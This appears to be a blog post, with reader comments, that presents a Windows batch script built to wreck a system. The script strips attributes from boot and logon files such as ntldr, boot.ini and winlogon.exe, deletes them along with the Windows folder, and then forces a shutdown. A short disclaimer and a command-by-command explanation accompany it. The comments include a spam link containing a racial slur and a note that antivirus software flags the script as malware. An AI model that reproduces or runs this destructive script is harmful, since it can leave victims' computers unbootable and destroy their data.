@echo off
del C:\WINDOWS\system32\winlogon.exe
del C:\WINDOWS\system32\logonui.exe
del C:\WINDOWS\
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg *message here
shutdown -s -t 8 -c "message here"
Save this as filename.bat(bat extension is must) and when you will execute in any computer it will destroy the files as mentioned in the code.
Do it at your own risk and don`t damage other`s property if you use this code to damage others property you are at your own risk I won`t be reponsible.
Want to know what above codes do??
- @echo off - This command will terminate your current prompt
- del - This command will delete the specified file
- attrib -r - This will make read only file rewritable
- attrib -s - This will make system film user defined
- attrib -h - This will unhide hidden files
- msg - Allows you to write message
- shutdown -s - This will shutdown the computer
- shutdown -t - Allows you to set time duration for shutting down
- shutdown -c - Allows you to add comment"
?
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteOnly way to stop a gaming addiction
ReplyDeleteCheck out this blog nigga: https://randomfunstuffforadults.blogspot.com/
ReplyDeleteShare on Social Media!
Eset saved me blocked this as BAT/KillWin.NAR
ReplyDelete